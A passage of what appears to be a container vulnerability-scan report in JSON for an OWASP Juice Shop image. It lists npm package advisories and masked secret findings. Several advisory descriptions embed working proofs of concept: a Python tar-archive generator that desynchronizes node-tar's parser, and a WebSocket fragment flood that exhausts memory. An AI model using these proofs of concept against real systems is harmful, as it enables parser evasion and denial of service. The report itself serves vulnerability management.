Header(chunk, position, this[EX], this[GEX])\n```\n\nand later branches on whether that header is a metadata entry. `this[EX]` is\ncleared only in the non-meta (real file) branch:\n\n```ts\nif (entry.meta) {\n // L / K / x / g metadata entries: this[EX] is left intact here\n if (entry.size \u003e this.maxMetaEntrySize) {\n entry.ignore = true\n this[STATE] = 'ignore'\n entry.resume()\n } else if (entry.size \u003e 0) {\n this[META] = ''\n entry.on('data', c =\u003e (this[META] += c))\n this[STATE] = 'meta'\n }\n} else {\n this[EX] = undefined // EX cleared only once a real file entry is reached\n}\n```\n\nWhen the stream is ordered `x (PAX, size=N) -\u003e L (GNU long-name) -\u003e file`, the\n`L` header is constructed with `this[EX]` still set, so its `size`/`remain`\nbecomes `N` instead of the `L` payload's true length. node-tar then consumes `N`\nbytes of \"metadata\" and resumes header parsing at the wrong offset, landing\nmid-stream. Every other mainstream parser applies the PAX `size` only to the\nfollowing *file* entry, so they stay synchronized.\n\nThe correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is\nto **not** apply PAX `size`/overrides when the entry being decoded is itself an\nextension header (`L` GNU long-name, `K` GNU long-link, `x` PAX local, `g` PAX\nglobal).\n\n### How input reaches the sink\n\n`tar.list()`, `tar.extract()`/`tar.x()`, and `tar.Parse`/`tar.Unpack` all route\nevery 512-byte header block through `Header.decode(...)` with the\ncurrently-accumulated `EX`/`GEX`. Any consumer that parses an attacker-supplied\narchive — `tar.list`, `tar.extract`, or piping into the streaming `Parser` —\nreaches the sink. No options need to be enabled; the default code path is\naffected.\n\n### Proof of concept\n\nArchive layout (all standard, GNU-tar-producible blocks):\n\n```\nblock 0 : x header (PAX local extended, typeflag 'x'), its own size = len(pax body)\nblock 1 : x payload : the single PAX record \"...size=2048\\n\"\nblock 2 : L header (GNU long-name '././@LongLink'), real size = 13\nblock 3 : L payload : \"longname.txt\\0\" (the long name for the next file)\nblock 4 : file header 'file_a', size = 16\nblock 5 : file_a body (16 bytes, zero-padded to 512)\nblock 6 : file header 'file_b', size = 16\nblock 7 : file_b body (16 bytes, zero-padded to 512)\n```\n\nGenerator (`make_tar.py`, pure stdlib, no external deps):\n\n```python\ndef hdr(name, size, typeflag):\n h = bytearray(512); name = name[:100]; h[0:len(name)] = name\n h[100:108] = b'0000644\\0'; h[108:116] = b'0000000\\0'; h[116:124] = b'0000000\\0'\n h[124:136] = ('%011o\\0' % size).encode(); h[136:148] = b'00000000000\\0'\n h[156:157] = typeflag; h[257:263] = b'ustar\\0'; h[263:265] = b'00'\n h[148:156] = b' ' * 8\n cs = sum(h); h[148:156] = ('%06o\\0 ' % cs).encode()\n return bytes(h)\n\ndef pad(d):\n return d + b'\\0' * ((512 - len(d) % 512) % 512)\n\ndef pax_record(key, val): # length-prefixed PAX record \"LEN key=val\\n\"\n body = b' %s=%s\\n' % (key.encode(), str(val).encode()); n = len(body)\n while True:\n s = str(n).encode() + body\n if len(s) == n: break\n n = len(s)\n return s\n\npax = pax_record('size', 2048) # malicious: claim size=2048 for the \"next\" entry\nout = hdr(b'PaxHeaders/x', len(pax), b'x') + pad(pax)\nout += hdr(b'././@LongLink', 13, b'L') + pad(b'longname.txt\\0')\nout += hdr(b'file_a', 16, b'0') + pad(b'AAAA_file_a_body')\nout += hdr(b'file_b', 16, b'0') + pad(b'BBBB_file_b_body')\nout += b'\\0' * 1024\nopen('pax-desync.tar', 'wb').write(out)\n```\n\nA negative-control archive is identical except the PAX record is\n`pax_record('comment', 'x')` (no `size=`), written to `pax-control.tar`.\n\n### End-to-end reproduction (against pinned version `tar@7.5.15`, latest release)\n\nInstall the published package into a clean project and parse both archives:\n\n```\n$ npm init -y \u003e/dev/null \u0026\u0026 npm install tar@7.5.15\n$ node -e \"console.log(require('tar/package.json').version)\"\n7.5.15\n$ grep -n \"ex?.size ?? gex?.size\" node_modules/tar/dist/esm/header.js\n49: this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12);\n```\n\n`e2e.mjs`:\n\n```js\nimport * as tar from 'tar'\nasync function listEntries(f){\n const got=[], warns=[]\n await tar.list({ file:f, onReadEntry:e=\u003e{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() },\n onwarn:(code,_msg)=\u003ewarns.push(code) })\n return { got, warns }\n}\nconst mal = await listEntries('pax-desync.tar')\nconsole.log('MALICIOUS entries :', JSON.stringify(mal.got), 'warnings:', JSON.stringify(mal.warns))\nconst ctl = await listEntries('pax-control.tar')\nconsole.log('CONTROL entries :', JSON.stringify(ctl.got), 'warnings:', JSON.stringify(ctl.warns))\n```\n\nVerbatim output:\n\n```\n=== Deployed-consumer E2E: npm tar@7.5.15 (latest release) ===\n\n[MALICIOUS] archive = x(PAX size=2048) -\u003e L(GNU longname \"longname.txt\") -\u003e file_a(16B) -\u003e file_b(16B)\n tar.list() entries : []\n tar.list() warnings: [\"TAR_ENTRY_INVALID\"]\n\n[NEGATIVE CONTROL] same archive, PAX record is \"comment=x\" (no size= override)\n tar.list() entries : [{\"path\":\"longname.txt\",\"size\":16,\"type\":\"File\"},{\"path\":\"file_b\",\"size\":16,\"type\":\"File\"}]\n tar.list() warnings: []\n```\n\nReference parsers on the **same** `pax-desync.tar`:\n\n```\n$ tar tvf pax-desync.tar\n-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # GNU tar\n\n$ bsdtar tvf pax-desync.tar\n-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # libarchive\n\n$ python3 -c \"import tarfile; print([m.name for m in tarfile.open('pax-desync.tar').getmembers()])\"\n['longname.txt'] # Python tarfile\n```\n\nInterpretation differential: GNU tar, libarchive (bsdtar), and Python `tarfile`\nall extract the member `longname.txt` from `pax-desync.tar`, whereas node-tar\n`7.5.15` desynchronizes, raises `TAR_ENTRY_INVALID` (checksum failure from\nlanding mid-stream), and reports **zero** members. The negative control proves\nthe divergence is caused solely by the PAX `size=` override being applied to the\nintermediary `L` header — when the same archive carries a PAX record without\n`size=`, node-tar parses it identically to the reference tools\n(`longname.txt`, `file_b`).\n\n### Suggested fix\n\nWhen decoding a header, do not apply PAX `size` (or other PAX overrides) if the\nheader being decoded is itself an extension header. Concretely, in\n`src/parse.ts` clear/ignore `this[EX]` (and `this[GEX]` for `size`) when the\nheader's type is `ExtendedHeader`, `GlobalExtendedHeader`, `NextFileHasLongPath`\n(GNU `L`), or `NextFileHasLongLinkpath` (GNU `K`); equivalently, in\n`Header.decode`, gate the `ex?.size ?? gex?.size` override on the decoded type\nnot being one of those extension types. This mirrors the upstream Rust fix,\nwhich guards `pax_size` with\n`is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions`.\n\nA fix PR is being prepared against a private fork and will be linked here.\n\n### Fix PR\n\nTo be linked from a private fork of the repository (the fix will not be pushed\nto any public fork or to upstream during embargo).\n\n### Credits\n\nReported by tonghuaroot.", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", + "V40Score": 6.9 + } + }, + "References": [ + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-vmf3-w455-68vh" + ] + }, + { + "VulnerabilityID": "CVE-2026-41907", + "VendorIDs": [ + "GHSA-w5hq-g745-h8pq" + ], + "PkgID": "uuid@8.3.2", + "PkgName": "uuid", + "PkgPath": "juice-shop/node_modules/uuid/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/uuid@8.3.2", + "UID": "1f1e50f54c76f55d" + }, + "InstalledVersion": "8.3.2", + "FixedVersion": "11.1.1, 12.0.1, 13.0.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41907", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:f6082f9abf4ebe6ecdead98825707ad74360fd70020e9e1ec3f429cda13263e4", + "Title": "uuid: uuid: Out-of-bounds write vulnerability impacts data integrity and confidentiality", + "Description": "uuid is for the creation of RFC9562 (formerly RFC4122) UUIDs. Prior to 14.0.0, v3, v5, and v6 accept external output buffers but do not reject out-of-range writes (small buf or large offset). This allows silent partial writes into caller-provided buffers. This vulnerability is fixed in 14.0.0.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-787", + "CWE-823" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", + "V3Score": 7.5, + "V40Score": 6.3 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L", + "V3Score": 4.8 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-41907", + "https://github.com/uuidjs/uuid", + "https://github.com/uuidjs/uuid/commit/32389c887c9e75f90442ee4cc95bbab0c4e8346e", + "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", + "https://github.com/uuidjs/uuid/commit/3d61d6ac1f782cf6b1dd8661c60f11722cd49a0d", + "https://github.com/uuidjs/uuid/commit/9d27ddf7046ce496ef39569ff84d948eeff9cb2a", + "https://github.com/uuidjs/uuid/releases/tag/v11.1.1", + "https://github.com/uuidjs/uuid/releases/tag/v12.0.1", + "https://github.com/uuidjs/uuid/releases/tag/v13.0.1", + "https://github.com/uuidjs/uuid/releases/tag/v14.0.0", + "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq", + "https://nvd.nist.gov/vuln/detail/CVE-2026-41907", + "https://www.cve.org/CVERecord?id=CVE-2026-41907" + ], + "PublishedDate": "2026-04-24T19:17:14.49Z", + "LastModifiedDate": "2026-05-11T13:53:19.343Z" + }, + { + "VulnerabilityID": "CVE-2024-37890", + "VendorIDs": [ + "GHSA-3h5v-q93c-6h6q" + ], + "PkgID": "ws@7.4.6", + "PkgName": "ws", + "PkgPath": "juice-shop/node_modules/engine.io/node_modules/ws/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/ws@7.4.6", + "UID": "e83b87b6f7940c56" + }, + "InstalledVersion": "7.4.6", + "FixedVersion": "5.2.4, 6.2.3, 7.5.10, 8.17.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-37890", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:271de5924340bb552eb635b87195871eda6db2e0a8331624db0a9ca4695cc85c", + "Title": "nodejs-ws: denial of service when handling a request with many HTTP headers", + "Description": "ws is an open source WebSocket client and server for Node.js. A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server. The vulnerability was fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-476" + ], + "VendorSeverity": { + "cbl-mariner": 3, + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V3Score": 7.5, + "V40Score": 8.7 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2024-37890", + "https://github.com/websockets/ws", + "https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f", + "https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e", + "https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c", + "https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63", + "https://github.com/websockets/ws/issues/2230", + "https://github.com/websockets/ws/pull/2231", + "https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q", + "https://nodejs.org/api/http.html#servermaxheaderscount", + "https://nvd.nist.gov/vuln/detail/CVE-2024-37890", + "https://www.cve.org/CVERecord?id=CVE-2024-37890" + ], + "PublishedDate": "2024-06-17T20:15:13.203Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "CVE-2026-48779", + "VendorIDs": [ + "GHSA-96hv-2xvq-fx4p" + ], + "PkgID": "ws@7.4.6", + "PkgName": "ws", + "PkgPath": "juice-shop/node_modules/engine.io/node_modules/ws/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/ws@7.4.6", + "UID": "e83b87b6f7940c56" + }, + "InstalledVersion": "7.4.6", + "FixedVersion": "5.2.5, 6.2.4, 7.5.11, 8.21.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-48779", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:36e741ad0cdad6a09f0d45fa53d0577b83d43bcc32322b762c0ef63aba51e61c", + "Title": "ws: Memory exhaustion DoS from tiny fragments and data chunks", + "Description": "### Impact\n\nA high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.\n\n### Proof of concept\n\n```js\nimport { WebSocket, WebSocketServer } from 'ws';\n\nconst wss = new WebSocketServer({ port: 0 }, function () {\n const data = Buffer.alloc(1);\n const options = { fin: false };\n const { port } = wss.address();\n const ws = new WebSocket(`ws://localhost:${port}`);\n\n ws.on('open', function () {\n (function send() {\n ws.send(data, options, function (err) {\n if (err) return;\n send();\n });\n })();\n });\n\n ws.on('error', console.error);\n ws.on('close', function (code, reason) {\n console.log(`client close - code: ${code} reason: ${reason.toString()}`);\n });\n});\n\nwss.on('connection', function (ws) {\n ws.on('error', console.error);\n ws.on('close', function (code, reason) {\n console.log(`server close - code: ${code} reason: ${reason.toString()}`);\n });\n});\n```\n\n### Patches\n\nThe vulnerability was fixed in ws@8.21.0 (https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94) and backported to ws@7.5.11 (https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8), ws@6.2.4 (https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7), and ws@5.2.5 (https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53).\n\n### Workarounds\n\nIn vulnerable versions, the issue can be mitigated by lowering the value of the `maxPayload` option if possible.\n\n### Credits\n\nThe vulnerability was responsibly disclosed and fixed by [Nadav Magier](https://github.com/Nadav0077).", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/websockets/ws", + "https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7", + "https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53", + "https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94", + "https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8", + "https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p" + ] + }, + { + "VulnerabilityID": "CVE-2026-48779", + "VendorIDs": [ + "GHSA-96hv-2xvq-fx4p" + ], + "PkgID": "ws@8.17.1", + "PkgName": "ws", + "PkgPath": "juice-shop/node_modules/ws/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/ws@8.17.1", + "UID": "7465b75db3996441" + }, + "InstalledVersion": "8.17.1", + "FixedVersion": "5.2.5, 6.2.4, 7.5.11, 8.21.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-48779", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:c75ad9b1eef47e253fe706246461e2441d4a740317973a631912b0c37129c888", + "Title": "ws: Memory exhaustion DoS from tiny fragments and data chunks", + "Description": "### Impact\n\nA high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.\n\n### Proof of concept\n\n```js\nimport { WebSocket, WebSocketServer } from 'ws';\n\nconst wss = new WebSocketServer({ port: 0 }, function () {\n const data = Buffer.alloc(1);\n const options = { fin: false };\n const { port } = wss.address();\n const ws = new WebSocket(`ws://localhost:${port}`);\n\n ws.on('open', function () {\n (function send() {\n ws.send(data, options, function (err) {\n if (err) return;\n send();\n });\n })();\n });\n\n ws.on('error', console.error);\n ws.on('close', function (code, reason) {\n console.log(`client close - code: ${code} reason: ${reason.toString()}`);\n });\n});\n\nwss.on('connection', function (ws) {\n ws.on('error', console.error);\n ws.on('close', function (code, reason) {\n console.log(`server close - code: ${code} reason: ${reason.toString()}`);\n });\n});\n```\n\n### Patches\n\nThe vulnerability was fixed in ws@8.21.0 (https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94) and backported to ws@7.5.11 (https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8), ws@6.2.4 (https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7), and ws@5.2.5 (https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53).\n\n### Workarounds\n\nIn vulnerable versions, the issue can be mitigated by lowering the value of the `maxPayload` option if possible.\n\n### Credits\n\nThe vulnerability was responsibly disclosed and fixed by [Nadav Magier](https://github.com/Nadav0077).", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/websockets/ws", + "https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7", + "https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53", + "https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94", + "https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8", + "https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p" + ] + }, + { + "VulnerabilityID": "CVE-2026-45736", + "VendorIDs": [ + "GHSA-58qx-3vcg-4xpx" + ], + "PkgID": "ws@8.17.1", + "PkgName": "ws", + "PkgPath": "juice-shop/node_modules/ws/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/ws@8.17.1", + "UID": "7465b75db3996441" + }, + "InstalledVersion": "8.17.1", + "FixedVersion": "8.20.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45736", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:f6484c34f92ab2250c303a41845071b3f8b8dd012cef69aebb99d0ccf8982604", + "Title": "ws is an open source WebSocket client and server for Node.js. Prior to ...", + "Description": "ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-908" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 4.4 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/websockets/ws", + "https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086", + "https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-45736" + ], + "PublishedDate": "2026-05-15T15:16:54.103Z", + "LastModifiedDate": "2026-05-19T14:39:20.353Z" + } + ] + }, + { + "Target": "/juice-shop/build/lib/insecurity.js", + "Class": "secret", + "Secrets": [ + { + "RuleID": "private-key", + "Category": "AsymmetricPrivateKey", + "Severity": "HIGH", + "Title": "Asymmetric Private Key", + "StartLine": 46, + "EndLine": 46, + "Code": { + "Lines": [ + { + "Number": 44, + "Content": "const z85 = __importStar(require(\"z85\"));", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "Highlighted": "const z85 = __importStar(require(\"z85\"));", + "FirstCause": false, + "LastCause": false + }, + { + "Number": 45, + "Content": "exports.publicKey = node_fs_1.default ? node_fs_1.default.readFileSync('encryptionkeys/jwt.pub', 'ut", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "Highlighted": "exports.publicKey = node_fs_1.default ? node_fs_1.default.readFileSync('encryptionkeys/jwt.pub', 'ut", + "FirstCause": false, + "LastCause": false + }, + { + "Number": 46, + "Content": "----BEGIN RSA PRIVATE KEY-----****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************-----END RSA PRIVATE", + "IsCause": true, + "Annotation": "", + "Truncated": false, + "Highlighted": "----BEGIN RSA PRIVATE KEY-----****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************-----END RSA PRIVATE", + "FirstCause": true, + "LastCause": true + }, + { + "Number": 47, + "Content": "const hash = (data) =\u003e node_crypto_1.default.createHash('md5').update(data).digest('hex');", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "Highlighted": "const hash = (data) =\u003e node_crypto_1.default.createHash('md5').update(data).digest('hex');", + "FirstCause": false, + "LastCause": false + } + ] + }, + "Match": "----BEGIN RSA PRIVATE KEY-----****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************-----END RSA PRIVATE", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed", + "CreatedBy": "COPY --chown=65532:0 /juice-shop . # buildkit" + }, + "Offset": 2765 + } + ] + }, + { + "Target": "/juice-shop/frontend/src/app/app.guard.spec.ts", + "Class": "secret", + "Secrets": [ + { + "RuleID": "jwt-token", + "Category": "JWT", + "Severity": "MEDIUM", + "Title": "JWT token", + "StartLine": 46, + "EndLine": 46, + "Code": { + "Lines": [ + { + "Number": 44, + "Content": " const guard = TestBed.inject(LoginGuard)", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "Highlighted": " const guard = TestBed.inject(LoginGuard)", + "FirstCause": false, + "LastCause": false + }, + { + "Number": 45, + "Content": "", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "FirstCause": false, + "LastCause": false + }, + { + "Number": 46, + "Content": "ocalStorage.setItem('token', '***********************************************************************************************************************************************************')", + "IsCause": true, + "Annotation": "", + "Truncated": false, + "Highlighted": "ocalStorage.setItem('token', '***********************************************************************************************************************************************************')", + "FirstCause": true, + "LastCause": true + }, + { + "Number": 47, + "Content": " expect(guard.tokenDecode()).toEqual({", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "Highlighted": " expect(guard.tokenDecode()).toEqual({", + "FirstCause": false, + "LastCause": false + } + ] + }, + "Match": "ocalStorage.setItem('token', '***********************************************************************************************************************************************************')", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed", + "CreatedBy": "COPY --chown=65532:0 /juice-shop . # buildkit" + }, + "Offset": 1587 + } + ] + }, + { + "Target": "/juice-shop/frontend/src/app/last-login-ip/last-login-ip.component.spec.ts", + "Class": "secret", + "Secrets": [ + { + "RuleID": "jwt-token", + "Category": "JWT", + "Severity": "MEDIUM", + "Title": "JWT token", + "StartLine": 72, + "EndLine": 72, + "Code": { + "Lines": [ + { + "Number": 70, + "Content": "", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "FirstCause": false, + "LastCause": false + }, + { + "Number": 71, + "Content": " it('should set Last-Login IP from JWT as trusted HTML', () =\u003e {", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "Highlighted": " it('should set Last-Login IP from JWT as trusted HTML', () =\u003e {", + "FirstCause": false, + "LastCause": false + }, + { + "Number": 72, + "Content": "ocalStorage.setItem('token', '*******************************************************************************************************************************')", + "IsCause": true, + "Annotation": "", + "Truncated": false, + "Highlighted": "ocalStorage.setItem('token', '*******************************************************************************************************************************')", + "FirstCause": true, + "LastCause": true + }, + { + "Number": 73, + "Content": " component.ngOnInit()", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "Highlighted": " component.ngOnInit()", + "FirstCause": false, + "LastCause": false + } + ] + }, + "Match": "ocalStorage.setItem('token', '*******************************************************************************************************************************')", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed", + "CreatedBy": "COPY --chown=65532:0 /juice-shop . # buildkit" + }, + "Offset": 2540 + } + ] + }, + { + "Target": "/juice-shop/lib/insecurity.ts", + "Class": "secret", + "Secrets": [ + { + "RuleID": "private-key", + "Category": "AsymmetricPrivateKey", + "Severity": "HIGH", + "Title": "Asymmetric Private Key", + "StartLine": 23, + "EndLine": 23, + "Code": { + "Lines": [ + { + "Number": 21, + "Content": "", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "FirstCause": false, + "LastCause": false + }, + { + "Number": 22, + "Content": "export const publicKey = fs ? fs.readFileSync('encryptionkeys/jwt.pub', 'utf8') : 'placeholder-publi", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "Highlighted": "export const publicKey = fs ? fs.readFileSync('encryptionkeys/jwt.pub', 'utf8') : 'placeholder-publi", + "FirstCause": false, + "LastCause": false + }, + { + "Number": 23, + "Content": "----BEGIN RSA PRIVATE KEY-----****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************-----END RSA PRIVATE", + "IsCause": true, + "Annotation": "", + "Truncated": false, + "Highlighted": "----BEGIN RSA PRIVATE KEY-----****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************-----END RSA PRIVATE", + "FirstCause": true, + "LastCause": true + }, + { + "Number": 24, + "Content": "", + 